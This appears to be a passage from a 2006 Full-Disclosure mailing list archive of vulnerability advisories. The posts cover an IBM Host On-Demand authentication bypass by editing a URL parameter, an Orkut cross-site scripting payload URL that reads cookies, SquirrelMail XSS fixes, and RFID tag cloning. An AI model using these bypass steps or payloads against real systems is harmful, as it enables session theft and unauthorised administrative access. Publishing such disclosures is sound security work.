identifying and responsibly reporting this issue. ====================================================================== 9) References The Common Vulnerabilities and Exposures (CVE) project has not currently assigned a CVE identifier for the security issue. ====================================================================== 10) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 11) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-69/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From randy at procyonlabs.com Tue Dec 12 11:39:37 2006 From: randy at procyonlabs.com (Randal T. Rioux) Date: Tue, 12 Dec 2006 06:39:37 -0500 Subject: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation In-Reply-To: <20061209012137.889CB6544A@evolution.bress.net> References: <20061209012137.889CB6544A@evolution.bress.net> Message-ID: <457E94F9.9070602@procyonlabs.com> Josh Bressers wrote: >> eEye Research - http://research.eeye.com >> >> Intel Network Adapter Driver Local Privilege Escalation >> >> Release Date: >> December 7, 2006 >> >> Date Reported: >> July 10, 2006 >> >> Severity: >> Medium (Local Privilege Escalation to Kernel) >> >> Systems Affected: >> Windows 2000, XP, 2003, Vista >> Intel PRO 10/100 - 8.0.27.0 or previous >> Intel PRO/1000 - 8.7.1.0 or previous >> Intel PRO/1000 PCI - 9.1.30.0 or previous >> Linux >> Intel PRO 10/100 - 3.5.14 or previous >> Intel PRO/1000 - 7.2.7 or previous >> Intel PRO/10GbE - 1.0.109 or previous >> UnixWare/SCO6 >> Intel PRO 10/100 - 4.0.3 or previous >> Intel PRO/1000 - 9.0.15 or previous > > It's worth noting that this advisory is misleading. This flaw does not > affect the Linux drivers. The Linux drivers do not support the NDIS API > and the OID concept that Windows does. > Thanks for the confirmation... I thought I had gone mad for a bit there. It just didn't sound right. The version numbers threw me off. Does anyone know how these specific Linux driver version numbers were determined? Randy From stacksmasher at gmail.com Mon Dec 11 13:15:19 2006 From: stacksmasher at gmail.com (Stack Smasher) Date: Mon, 11 Dec 2006 08:15:19 -0500 Subject: [Full-disclosure] Card Fraud Message-ID: <591fd0b20612110515j767241b0mcdc40d6f08b5b787@mail.gmail.com> Who is the responsible organization in the US for card fraud? Thanks -- "If you see me laughing, you better have backups" -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061211/a03b622d/attachment.html From Dave.Ferguson at fishnetsecurity.com Mon Dec 11 14:39:09 2006 From: Dave.Ferguson at fishnetsecurity.com (Ferguson, David (Kansas City)) Date: Mon, 11 Dec 2006 08:39:09 -0600 Subject: [Full-disclosure] Unauthenticated access to IBM Host On-Demand administration pages Message-ID: <6868F396F5637540AE9D274CC90BD88F025F73B2@FNEX01.fishsec.com> SUMMARY Vulnerability found in: IBM WebSphere Host On-Demand (HOD) Type: Unauthorized, remote access to HOD administration pages Applies to: Version 6.0, 7.0, 8.0, and 9.0 (possibly 10.0) Severity Level: High Exploit Difficulty: Very Low Initial Vendor Notification: approximately 11/3/2006 Discovered By: Dave Ferguson, FishNet Security Secunia advisory location: http://secunia.com/advisories/22652 BACKGROUND IBM's WebSphere Host On-Demand (HOD) provides a framework for accessing host applications and data from a Java-enabled web browser. The HOD administration pages consist of a set of Java applets. One applet controls user authentication. Others allow you to start and stop services, manage users, configure telnet redirectors, set up LDAP service, and manage licenses. Information about HOD can be found here: http://www-306.ibm.com/software/webservers/hostondemand. VULNERABILITY OVERVIEW FishNet Security discovered that a remote, unauthenticated user can access and interact with several of the HOD administration applets. Essentially, a simple URL manipulation attack can bypass the authentication and authorization process. This was found in HOD versions 6.0, 7.0, 8.0, and 9.0. Version 10 (released in 2006) may also be vulnerable, but was not tested. DETAILS The applet that handles user authentication is normally located at the following URL: https://server/hod/HODAdmin.html. Once this page loads and the applet is running, the URL showing in the web browser reads something like this: https://server/hod/frameset.html?Java2=true,Obplet=object,cshe=false,pnl=Logon,hgt=480,wth=640,full=fa lse,BrowserLocale=en.there. The web page displays an area for the user to logon and a menu on the left side with several links to other pages/applets. Each of these links is disabled. The links are: - Introduction - Users/Groups - Services - Redirector Service - Directory Service - OS/400 Proxy Server - Licenses - Logoff To bypass the authentication process, you change the value of "pnl" in the current URL. For example, to see the OS/400 Proxy Server page, you would change the pnl parameter from "Logon" to "os400proxy". The page loads and the functionality of the applet appears to be normal in every way. The other links in the menu become enabled, so changing the URL manually is no longer necessary. Two of the pages/applets seem to have additional access control, because the applets remain blank and/or empty and can't be used. Pages that could be accessed in an unauthenticated state: Services, Redirector Service, Directory Service, and OS/400 Proxy Server Pages that could NOT be accessed: Users/Groups and Licenses ATTACK SCENARIOS An attacker can perpetrate a number of actions: - stopping critical HOD services - reconfiguring existing services (e.g., port numbers, ip addresses) - creating and starting unnecessary services - changing the security configuration for redirectors - creating a user to administer the LDAP service Any of these could have an adverse effect on business operations and/or allow a malicious person to open more potential attack vectors. VENDOR RESPONSE Secunia notified IBM about this vulnerability around 11/3/2006. No response has been received. CONTACT You can reach the author of this advisory at: dave.ferguson[at]fishnetsecurity(dot)com From security at mandriva.com Mon Dec 11 17:50:00 2006 From: security at mandriva.com (security at mandriva.com) Date: Mon, 11 Dec 2006 10:50:00 -0700 Subject: [Full-disclosure] [ MDKSA-2006:226 ] - Updated squirrelmail packages fix vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:226 http://www.mandriva.com/security/ _______________________________________________________________________ Package : squirrelmail Date : December 11, 2006 Affected: Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.0 through 1.4.9 allow remote attackers to inject arbitrary web script or HTML via the (1) mailto parameter in (a) webmail.php, the (2) session and (3) delete_draft parameters in (b) compose.php, and (4) unspecified vectors involving "a shortcoming in the magicHTML filter." Updated packages are patched to address these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6142 _______________________________________________________________________ Updated Packages: Corporate 3.0: fdd1baf652c58196f2b538b389bec65f corporate/3.0/i586/squirrelmail-1.4.5-1.5.C30mdk.noarch.rpm 89d39b6fc6a73d84feeb9f3deb458d0a corporate/3.0/i586/squirrelmail-poutils-1.4.5-1.5.C30mdk.noarch.rpm d4de921727ae29bba7221a3e93d487bc corporate/3.0/SRPMS/squirrelmail-1.4.5-1.5.C30mdk.src.rpm Corporate 3.0/X86_64: ba27570deb04e7ff3400a280bbe75d52 corporate/3.0/x86_64/squirrelmail-1.4.5-1.5.C30mdk.noarch.rpm 276acc4e766908c326321cd214abd341 corporate/3.0/x86_64/squirrelmail-poutils-1.4.5-1.5.C30mdk.noarch.rpm d4de921727ae29bba7221a3e93d487bc corporate/3.0/SRPMS/squirrelmail-1.4.5-1.5.C30mdk.src.rpm Corporate 4.0: 9503ad05873246568977df58ddc01e96 corporate/4.0/i586/squirrelmail-1.4.8-3.1.20060mlcs4.noarch.rpm 15d7cc5cf7b4f377c989dbfdfde9bc3a corporate/4.0/i586/squirrelmail-ar-1.4.8-3.1.20060mlcs4.noarch.rpm cbb2b592b960ee18160b0545bd01b11b corporate/4.0/i586/squirrelmail-bg-1.4.8-3.1.20060mlcs4.noarch.rpm 823a98906ea456700be9f9301c03d3ca corporate/4.0/i586/squirrelmail-bn-1.4.8-3.1.20060mlcs4.noarch.rpm da53ecb3b61aacb38d9091416be2ad56 corporate/4.0/i586/squirrelmail-ca-1.4.8-3.1.20060mlcs4.noarch.rpm a678e3d9380e1ab15f7232f64a4eb968 corporate/4.0/i586/squirrelmail-cs-1.4.8-3.1.20060mlcs4.noarch.rpm f8b349923a77d8b844aa8ec86a63271d corporate/4.0/i586/squirrelmail-cy-1.4.8-3.1.20060mlcs4.noarch.rpm 276bd5cfb76328244e1359e5026b5d6b corporate/4.0/i586/squirrelmail-cyrus-1.4.8-3.1.20060mlcs4.noarch.rpm 39a5d34d477eb4ebe60e3a70c67f52e5 corporate/4.0/i586/squirrelmail-da-1.4.8-3.1.20060mlcs4.noarch.rpm 993a2c910c67f3c91723c2d4a0813f9c corporate/4.0/i586/squirrelmail-de-1.4.8-3.1.20060mlcs4.noarch.rpm 06f4e571aba0928134506bd2a9198932 corporate/4.0/i586/squirrelmail-el-1.4.8-3.1.20060mlcs4.noarch.rpm 63ec92841ad90c70dae9d64e72c82662 corporate/4.0/i586/squirrelmail-en-1.4.8-3.1.20060mlcs4.noarch.rpm d8e5a906d6e759ae19ff100690ec5e63 corporate/4.0/i586/squirrelmail-es-1.4.8-3.1.20060mlcs4.noarch.rpm 385f47aa4d9812a0a7d75a9db33b18b9 corporate/4.0/i586/squirrelmail-et-1.4.8-3.1.20060mlcs4.noarch.rpm 39fe314ed16fda2f4d342dc7f45271a4 corporate/4.0/i586/squirrelmail-eu-1.4.8-3.1.20060mlcs4.noarch.rpm 2959c6d41637880844da2a4b928ab3ea corporate/4.0/i586/squirrelmail-fa-1.4.8-3.1.20060mlcs4.noarch.rpm 0f26c752ebe55b741da49ffc8e7df910 corporate/4.0/i586/squirrelmail-fi-1.4.8-3.1.20060mlcs4.noarch.rpm fb53b2054f25f65f75529a4500adb05e corporate/4.0/i586/squirrelmail-fo-1.4.8-3.1.20060mlcs4.noarch.rpm 52204b63d7536a948aefe250b075ab4b corporate/4.0/i586/squirrelmail-fr-1.4.8-3.1.20060mlcs4.noarch.rpm c877a11c38c60fa0664b425190d73e6b corporate/4.0/i586/squirrelmail-he-1.4.8-3.1.20060mlcs4.noarch.rpm 59aac3b1912c3da62b3b721361db620b corporate/4.0/i586/squirrelmail-hr-1.4.8-3.1.20060mlcs4.noarch.rpm 91fa54fde44d76216b3195a6e6e7f1a4 corporate/4.0/i586/squirrelmail-hu-1.4.8-3.1.20060mlcs4.noarch.rpm 8ad5805c6e351ae6fa6fbb53b13cb4de corporate/4.0/i586/squirrelmail-id-1.4.8-3.1.20060mlcs4.noarch.rpm af76a96cd2f1376eae5c1bf2f3d1f65b corporate/4.0/i586/squirrelmail-is-1.4.8-3.1.20060mlcs4.noarch.rpm 7b1f3d4cdcf063b1e8b5f308e217e554 corporate/4.0/i586/squirrelmail-it-1.4.8-3.1.20060mlcs4.noarch.rpm bc1f13031e7155bca253f5835ae0c90c corporate/4.0/i586/squirrelmail-ja-1.4.8-3.1.20060mlcs4.noarch.rpm a4f516f21f2036e89484dafe9d3d1a6c corporate/4.0/i586/squirrelmail-ka-1.4.8-3.1.20060mlcs4.noarch.rpm 0e9b7214f5ce67f1a7b55d0bd196d814 corporate/4.0/i586/squirrelmail-ko-1.4.8-3.1.20060mlcs4.noarch.rpm 35a4bc3bf9161ffc3d10c5e4aed52877 corporate/4.0/i586/squirrelmail-lt-1.4.8-3.1.20060mlcs4.noarch.rpm 75b9963fa101cb2c71831ce4dd4e7f33 corporate/4.0/i586/squirrelmail-ms-1.4.8-3.1.20060mlcs4.noarch.rpm ef4f24c8f94cb9e6384a35a556de256e corporate/4.0/i586/squirrelmail-nb-1.4.8-3.1.20060mlcs4.noarch.rpm 4d2b35b6527db41eec54c917dd44ba01 corporate/4.0/i586/squirrelmail-nl-1.4.8-3.1.20060mlcs4.noarch.rpm 5db7bfef8a1ccfd7b2e5d57ca119a7e0 corporate/4.0/i586/squirrelmail-nn-1.4.8-3.1.20060mlcs4.noarch.rpm afe1da824ed5c25db8046b4ddc2389d8 corporate/4.0/i586/squirrelmail-pl-1.4.8-3.1.20060mlcs4.noarch.rpm b22b1fbf3a474983d017a164d737bba9 corporate/4.0/i586/squirrelmail-poutils-1.4.8-3.1.20060mlcs4.noarch.rpm 9ca9b100b0649843e2f17ef33c69a3a2 corporate/4.0/i586/squirrelmail-pt-1.4.8-3.1.20060mlcs4.noarch.rpm 780fff6991d9116971c35ec2fa378d90 corporate/4.0/i586/squirrelmail-ro-1.4.8-3.1.20060mlcs4.noarch.rpm 99cad9c5a0c26db2c6698f1a9b6ed804 corporate/4.0/i586/squirrelmail-ru-1.4.8-3.1.20060mlcs4.noarch.rpm e074101cbddda0086eb8628528218abd corporate/4.0/i586/squirrelmail-sk-1.4.8-3.1.20060mlcs4.noarch.rpm 9c856a8fa088e9e5e8dc28a7c087b4d2 corporate/4.0/i586/squirrelmail-sl-1.4.8-3.1.20060mlcs4.noarch.rpm 9e8d04ac9b1c7c089055572e486fffa8 corporate/4.0/i586/squirrelmail-sr-1.4.8-3.1.20060mlcs4.noarch.rpm ee4c5f91c8065ff407aea103bb20e024 corporate/4.0/i586/squirrelmail-sv-1.4.8-3.1.20060mlcs4.noarch.rpm 93267f0d3add91d9fa71e2f1680a89f3 corporate/4.0/i586/squirrelmail-th-1.4.8-3.1.20060mlcs4.noarch.rpm 8614c64008b94ad139fdd3336421c920 corporate/4.0/i586/squirrelmail-tl-1.4.8-3.1.20060mlcs4.noarch.rpm 4a6fbf0245470d9fcf5072ae77ac4eef corporate/4.0/i586/squirrelmail-tr-1.4.8-3.1.20060mlcs4.noarch.rpm 3f2f133c3d0cacecadefc7648aae6c0d corporate/4.0/i586/squirrelmail-ug-1.4.8-3.1.20060mlcs4.noarch.rpm 2b836169ca514af3ded1383d027cd170 corporate/4.0/i586/squirrelmail-uk-1.4.8-3.1.20060mlcs4.noarch.rpm 46390f41d8942b9ca14c5cc81898a00f corporate/4.0/i586/squirrelmail-vi-1.4.8-3.1.20060mlcs4.noarch.rpm 930c18bdca20d0b1a65728b255a71f96 corporate/4.0/i586/squirrelmail-zh_CN-1.4.8-3.1.20060mlcs4.noarch.rpm 5dc8559e99284aff1e482457a0d1ed3d corporate/4.0/i586/squirrelmail-zh_TW-1.4.8-3.1.20060mlcs4.noarch.rpm b134bb2e680863641a457b9478b59390 corporate/4.0/SRPMS/squirrelmail-1.4.8-3.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: c2b0dd3acf47652ac205c2e0b3be24a9 corporate/4.0/x86_64/squirrelmail-1.4.8-3.1.20060mlcs4.noarch.rpm 0820ee17a848c6acc42444df660f9ac3 corporate/4.0/x86_64/squirrelmail-ar-1.4.8-3.1.20060mlcs4.noarch.rpm f372ff44ac3ac7ea668b57607897f694 corporate/4.0/x86_64/squirrelmail-bg-1.4.8-3.1.20060mlcs4.noarch.rpm a5bd987ea5051a5f3e81af1461a832ed corporate/4.0/x86_64/squirrelmail-bn-1.4.8-3.1.20060mlcs4.noarch.rpm 7be52eb4a430b2468d658edc54ea046f corporate/4.0/x86_64/squirrelmail-ca-1.4.8-3.1.20060mlcs4.noarch.rpm c84b32819f87050a562b045b0c48e53e corporate/4.0/x86_64/squirrelmail-cs-1.4.8-3.1.20060mlcs4.noarch.rpm 83cc2f2456de5579301ad5c0e4c120be corporate/4.0/x86_64/squirrelmail-cy-1.4.8-3.1.20060mlcs4.noarch.rpm de4aa16075840a7b7e07f1fe78ba93cb corporate/4.0/x86_64/squirrelmail-cyrus-1.4.8-3.1.20060mlcs4.noarch.rpm a43d22f7c65980cfed004909bbb30eab corporate/4.0/x86_64/squirrelmail-da-1.4.8-3.1.20060mlcs4.noarch.rpm 2358f02f874cce70b2c3981f56cbbf32 corporate/4.0/x86_64/squirrelmail-de-1.4.8-3.1.20060mlcs4.noarch.rpm eabb1921968805c7cbf22798fcebc7af corporate/4.0/x86_64/squirrelmail-el-1.4.8-3.1.20060mlcs4.noarch.rpm a43fb652af55cadf50258136fdeb2d74 corporate/4.0/x86_64/squirrelmail-en-1.4.8-3.1.20060mlcs4.noarch.rpm 4500d031b892b441f433746336c7dcf0 corporate/4.0/x86_64/squirrelmail-es-1.4.8-3.1.20060mlcs4.noarch.rpm 58cb4546b05efac31f3a64e1014095ee corporate/4.0/x86_64/squirrelmail-et-1.4.8-3.1.20060mlcs4.noarch.rpm dcf6ae26d69ade7fc454625046129360 corporate/4.0/x86_64/squirrelmail-eu-1.4.8-3.1.20060mlcs4.noarch.rpm ef5cf4b334635291e9a510bb9ed794eb corporate/4.0/x86_64/squirrelmail-fa-1.4.8-3.1.20060mlcs4.noarch.rpm 40b9915e723a0f573f1572cffaf03bf4 corporate/4.0/x86_64/squirrelmail-fi-1.4.8-3.1.20060mlcs4.noarch.rpm 0bfa396c60e5cf6a47229f69c9b337a1 corporate/4.0/x86_64/squirrelmail-fo-1.4.8-3.1.20060mlcs4.noarch.rpm bea0e3c16887a984a6f8fd7084d27db6 corporate/4.0/x86_64/squirrelmail-fr-1.4.8-3.1.20060mlcs4.noarch.rpm 43059bc5bc5c91e5414946b34eda580c corporate/4.0/x86_64/squirrelmail-he-1.4.8-3.1.20060mlcs4.noarch.rpm dba3a65e08dd093bd9f6865f403aca06 corporate/4.0/x86_64/squirrelmail-hr-1.4.8-3.1.20060mlcs4.noarch.rpm a97490f955480bb90321b5a96653f228 corporate/4.0/x86_64/squirrelmail-hu-1.4.8-3.1.20060mlcs4.noarch.rpm 0211d99cc8a5ed9385f3d0a59f8a5f1b corporate/4.0/x86_64/squirrelmail-id-1.4.8-3.1.20060mlcs4.noarch.rpm 6db9f5d3699dc30d5abf17bbf3367161 corporate/4.0/x86_64/squirrelmail-is-1.4.8-3.1.20060mlcs4.noarch.rpm 53029ee9fc829a6b4c20007fc8e15d99 corporate/4.0/x86_64/squirrelmail-it-1.4.8-3.1.20060mlcs4.noarch.rpm 1e7fbb15fe44df99d88732a11765c460 corporate/4.0/x86_64/squirrelmail-ja-1.4.8-3.1.20060mlcs4.noarch.rpm f65f1c05de5b647f503e7e1b203171d7 corporate/4.0/x86_64/squirrelmail-ka-1.4.8-3.1.20060mlcs4.noarch.rpm fe1d25b5ad531f90cf05af7c293a645f corporate/4.0/x86_64/squirrelmail-ko-1.4.8-3.1.20060mlcs4.noarch.rpm 144bfe711e3effd39cfc6e410ca9af0d corporate/4.0/x86_64/squirrelmail-lt-1.4.8-3.1.20060mlcs4.noarch.rpm 91d2336ef151704e2e7695d7637a989f corporate/4.0/x86_64/squirrelmail-ms-1.4.8-3.1.20060mlcs4.noarch.rpm 6c450896ce137fd1220658857e7fa7ee corporate/4.0/x86_64/squirrelmail-nb-1.4.8-3.1.20060mlcs4.noarch.rpm f6c1404ec21d6bc6ddba5a720fe7d2ef corporate/4.0/x86_64/squirrelmail-nl-1.4.8-3.1.20060mlcs4.noarch.rpm 5c289717bc9518ba1133d6e91b5e5a77 corporate/4.0/x86_64/squirrelmail-nn-1.4.8-3.1.20060mlcs4.noarch.rpm f459bf2f55c0733d63ce96eb365b9d22 corporate/4.0/x86_64/squirrelmail-pl-1.4.8-3.1.20060mlcs4.noarch.rpm e0a44506bb0f05f0443155b0faf19443 corporate/4.0/x86_64/squirrelmail-poutils-1.4.8-3.1.20060mlcs4.noarch.rpm 6f0b27637a7208b118bb7b9e06b477dd corporate/4.0/x86_64/squirrelmail-pt-1.4.8-3.1.20060mlcs4.noarch.rpm 9bfcb50cecb0ab7e32bd768b03692a0a corporate/4.0/x86_64/squirrelmail-ro-1.4.8-3.1.20060mlcs4.noarch.rpm d8093092134cc585726dd979efb4b651 corporate/4.0/x86_64/squirrelmail-ru-1.4.8-3.1.20060mlcs4.noarch.rpm 1c374b54c33289b2dcb0b237b3f133f5 corporate/4.0/x86_64/squirrelmail-sk-1.4.8-3.1.20060mlcs4.noarch.rpm bc93e042ec8afc9c72dda75f31099b49 corporate/4.0/x86_64/squirrelmail-sl-1.4.8-3.1.20060mlcs4.noarch.rpm 6e0c7da453b631024cbbeb7e12e7ba5c corporate/4.0/x86_64/squirrelmail-sr-1.4.8-3.1.20060mlcs4.noarch.rpm aa294e3ad85a698dd3c34777d4da7903 corporate/4.0/x86_64/squirrelmail-sv-1.4.8-3.1.20060mlcs4.noarch.rpm e603484d002b57e8a021ac28de0b3179 corporate/4.0/x86_64/squirrelmail-th-1.4.8-3.1.20060mlcs4.noarch.rpm c5f7e2607f8b5113af875c53628cbc19 corporate/4.0/x86_64/squirrelmail-tl-1.4.8-3.1.20060mlcs4.noarch.rpm 7182b852259c4be5e537418ec5b2305a corporate/4.0/x86_64/squirrelmail-tr-1.4.8-3.1.20060mlcs4.noarch.rpm 56a78e1547cab2d3b7efcccb35d7b010 corporate/4.0/x86_64/squirrelmail-ug-1.4.8-3.1.20060mlcs4.noarch.rpm abe4dbdd1dad7b5adb246195f1e0178b corporate/4.0/x86_64/squirrelmail-uk-1.4.8-3.1.20060mlcs4.noarch.rpm e871bd1da833d961cd62eba52a383354 corporate/4.0/x86_64/squirrelmail-vi-1.4.8-3.1.20060mlcs4.noarch.rpm 508e5df69a92f5759545e7279f5d729b corporate/4.0/x86_64/squirrelmail-zh_CN-1.4.8-3.1.20060mlcs4.noarch.rpm ec8c34458856e9b6aaefcdd5453dcb5e corporate/4.0/x86_64/squirrelmail-zh_TW-1.4.8-3.1.20060mlcs4.noarch.rpm b134bb2e680863641a457b9478b59390 corporate/4.0/SRPMS/squirrelmail-1.4.8-3.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFfW5wmqjQ0CJFipgRAvoRAJ9tgXJ7SymXjCVfv2XJoMBaPybpbQCeOOZb DtlfBAINiPFQINRoofLhzLg= =zXcQ -----END PGP SIGNATURE----- From adam.laurie at thebunker.net Mon Dec 11 17:51:40 2006 From: adam.laurie at thebunker.net (Adam Laurie) Date: Mon, 11 Dec 2006 17:51:40 +0000 Subject: [Full-disclosure] RFID access control tokens widely open to cloning Message-ID: <457D9AAC.6070502@thebunker.net> Too many systems to itemize here rely on the 'unique ID' of an RFID token to grant access to a system or building, and, in the case that these tokens are based on 125kHz or 134.2kHz standard tags, many of them may be vulnerable to relatively simple cloning attacks. In a way this is nothing new - several researchers have previously presented attacks whereby RFID tags were emulated by custom built circuits which were able to fool readers into thinking that a genuine tag had been presented. However, the industry response was normally that this was not a 'real' threat, as it required specialist knowledge and equipment, and the resulting device was not a 'true clone' as it didn't have the same form factor as the original. The difference here is that the 'clone' may actually follow the same form factor as the original, and is therefore indistinguishable not just to the reader, but also to the human eye. In addition, no specialist equipment or custom circuitry is required, and the 'clones' can be produced using off the shelf equipment, software and blank tags purchased perfectly legally over the Internet. In fact, the tags are only doing what they were designed to do in the first place: implement industry standards. The problem is that many security system suppliers are integrating industry standard tag readers, and promoting the 'uniqueness' of the tag ID as a guaranteed certainty when it isn't, and thereby compromising the security of the entire system. The two specific tag types I've looked at are: Trovan 'Unique', aka EM4x02 FDX-B, aka EM4x05 - ISO-11784/5 (animal tags) The description of the 'Unique' tag, from the Trovan website is as follows: "The TROVAN UNIQUE? Read-Only System is well-suited to applications that require a high level of data security. Unlike other vendors' factory preprogrammed lines, the protocol of the TROVAN UNIQUE? line is patented, providing unmatched protection against unauthorised third-party cloning. Each transponder is programmed with a unique 10-digit ID code during manufacture. Comprehensive automatic test methods ensure that no code exists in duplicate in any of the TROVAN UNIQUE? transponder types, and that codes are programmed correctly in a readable manner. Once the code is programmed at the time of the transponder's manufacture, it cannot be counterfeited or tampered with. A total of 550 billion unique ID codes is available." Q5 are general purpose, multi-standard tags, that are capable of emulating other devices. I found that it was a standard feature of the Q5 chip to emulate a 'Unique' tag, and it was trivial to program a duplicate ID into one. The resulting tags were tested against three different systems that I have access to, and all three systems were unable to distinguish between the original and the 'clone'. In response to my questioning the security of the Unique tags, the response I got from Trovan was: "There are a variety of H4102 versions, some of which can be emulated by a Q5 tag. Our tags are a custom version of the H4100 tag.". It should be noted that I am not pointing the finger at Trovan devices here, but the 'Unique' standard some of their tags implement and which are generally available as a generic tag type - it is sometimes hard to tell exactly who's devices or tags are used in a specific installation, but suffice it to say that I have found 3rd party systems (one at a very recent security systems show in London) that were vulnerable to EM4x02 style cloning. The equipment required to do this was a laptop and off the shelf RFID reader/writer, but it could just as easily have been a small handheld, and so a credible threat exists of simply swiping an access tag ID in a 'walk-by' of someone leaving a building, and then producing a clone which will give full access. I am also able to produce what seem to be accurate clones of FDX-B tags (such as the one in my dog), and also VeriChip tags, in as much as a standard FDX-B reader such as you might find at your local vet will not be able to tell the difference. I have not been able to test if a genuine VeriGuard system would also be fooled, but VeriCorp's response when I took it up with them was: "You can take a write once and re-writeable chip and put the VeriGuard ID number on this chip, and a lot of readers will read the ID and including the VeriGuard reader. I can not tell you every but their three things that tell are unit that it is a VeriChip 16 digits not 15, timing and one other thing. We call it copying not cloning because the can't get all the information need to send to the VeriGuard reader at the right time."[sic] The latest release of the open source python library, RFIDIOt (v0.1h), contains tools for programming both EM4x02 and EM4x05 tag IDs to Q5 or Hitag2 tags, and I would suggest that if you own (or supply) systems based on either of these standards, that you use them to audit for this vulnerability. Full details here: http://rfidiot.org cheers, Adam -- Adam Laurie Tel: +44 (0) 1304 814800 The Bunker Secure Hosting Ltd. Fax: +44 (0) 1304 814899 Ash Radar Station http://www.thebunker.net Marshborough Road Sandwich mailto:adam at thebunker.net Kent CT13 0PL UNITED KINGDOM PGP key on keyservers From rajesh.sethumadhavan at yahoo.com Mon Dec 11 20:14:48 2006 From: rajesh.sethumadhavan at yahoo.com (Rajesh Sethumadhavan) Date: Mon, 11 Dec 2006 12:14:48 -0800 (PST) Subject: [Full-disclosure] Orkut Group Cross Site Scripting Vulnerability Message-ID: <9193.65871.qm@web37203.mail.mud.yahoo.com> Orkut Group Cross Site Scripting Vulnerability ##################################################################### XDisclose Advisory : XD100098 Vulnerability Discovered: December 08th 2006 Advisory Released : December 12th 2006 Credit : Rajesh Sethumadhavan Class : Cross Site Scripting HTML Injection Severity : Medium Solution Status : Unpatched/Vendor notified Vendor : Google Inc Vendor Website : http://www.orkut.com Affected applications : Orkut Services Affected Platform : All ##################################################################### Overview: Orkut is an Internet social network service run by Google with more than 37 million total members and nearly 1.3 million daily visitors. It claims to be designed to help users meet new friends and maintain existing relationships with pictures and messages, and establish new ones by reaching out to people you've never met before. Orkut service is vulnerable to Cross-Site Scripting and HTML Injection. This is caused due to improper validation of user-supplied inputs. Description: A remote attacker can craft a GET request with the XSS payload as demonstrated below. When the victim access the mailcious URL payload will get executed which result in stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, hardware Info, modification of page or html injection, url redirection, port scanning of the network, and even phishing is possible. 1)Orkut Invite XSS: The flaws are due to improper sanitization of inputs passed to 'show' parameter in GET request ------------------------------------------------------------------- http://www.orkut.com/Friends.aspx?show=group1);alert(document.cookie ------------------------------------------------------------------ Demonstration: Note: Demonstration leads to your personal information disclosure - Login to your orkut account - Paste the above URL - Click on 'delete group' & 'ok' button - Orkut Cookies will get displayed The similar way HTML injection is also possible. Vulnerable Code: ------------------------------------------------------------------ < a href="javascript:handleDeleteGroup('', 1);alert(document.cookie);"> ------------------------------------------------------------------ Solution: Orkut can improve their filters by disallowing certain characters like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URL. Screenshot: http://xdisclose/images/xdorkutgroupxss.jpg Impact: Successful exploitation allows execution of arbitrary script code in a user?s browser session in context of an affected site which result in stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, referrer info, hardware Info, modification of page or html injection (temporary webpage defacement), modification of page title, hijacking page flow, url redirection, port scanning of the victim?s network, and even phishing is possible. Impact of the vulnerability is network level. Original Advisory: http://www.xdisclose.com/XD100098.txt Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your own orkut account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------- Have a burning question? Go to Yahoo! Answers and get answers from real people who know. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061211/0f32746c/attachment.html From brett.moore at security-assessment.com Mon Dec 11 23:01:02 2006 From: brett.moore at security-assessment.com (Brett Moore) Date: Tue, 12 Dec 2006 12:01:02 +1300 Subject: [Full-disclosure] [SBDA] SiteKiosk - FileSystem Access Message-ID: <3F6918F2F2125C4BB95462A2ED1454B10DE8BA@pukeko.smb2go.net> Still time before Christmas. ======================================================================== = SiteKiosk - FileSystem Access = = Vendor Website: = http://www.sitekiosk.com/ = = Affected Software: = SiteKiosk < 6.5.150 = = Public disclosure on Tuesday December 12, 2006 ======================================================================== == Overview == SiteKiosk is an application used to secure public access terminals. It is designed to provide a safe and stable way for the use of public access terminals with or without access to the Internet. SiteKiosk is based on Internet Explorer and can be configured to individually restrict access to Web sites, the operating system, system settings, and applications. Your computer will be protected against any manipulation from the time you boot until you shut it down. SiteKiosk suffers from a cross site scripting vulnerability, that leads to filesystem access. == Exploitation == SiteKiosk implements a 'skinning' feature so that the layout and display of the browser can be 